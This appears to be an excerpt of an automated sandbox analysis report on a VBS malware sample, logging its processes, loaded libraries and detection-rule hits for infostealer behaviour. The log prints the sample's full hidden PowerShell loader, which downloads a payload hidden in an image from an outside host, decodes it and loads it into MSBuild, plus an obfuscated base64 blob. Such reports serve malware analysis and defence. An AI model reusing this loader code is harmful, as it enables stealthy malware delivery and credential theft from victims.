QDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_032093687_2_03209368
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_032041787_2_03204178
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_03209B207_2_03209B20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_03204A487_2_03204A48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_03203E307_2_03203E30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0320D1587_2_0320D158
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_066D3F507_2_066D3F50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_066DDC407_2_066DDC40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_066DBD007_2_066DBD00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_066D8B987_2_066D8B98
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_066D00407_2_066D0040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_066D50007_2_066D5000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_06F335007_2_06F33500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0320D1527_2_0320D152
                      Source: Reconfirm Details.vbsInitial sample: Strings found which are bigger than 50
                      Source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: Process Memory Space: powershell.exe PID: 360, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: powershell.exe PID: 1472, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winVBS@12/6@4/4
                      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\IKfbD[1].txtJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1360:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wur450uw.1gf.ps1Jump to behavior
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Reconfirm Details.vbs"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Reconfirm Details.vbsVirustotal: Detection: 13%
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Reconfirm Details.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.noh/ba/moc.ocsnoshm//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.noh/ba/moc.ocsnoshm//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
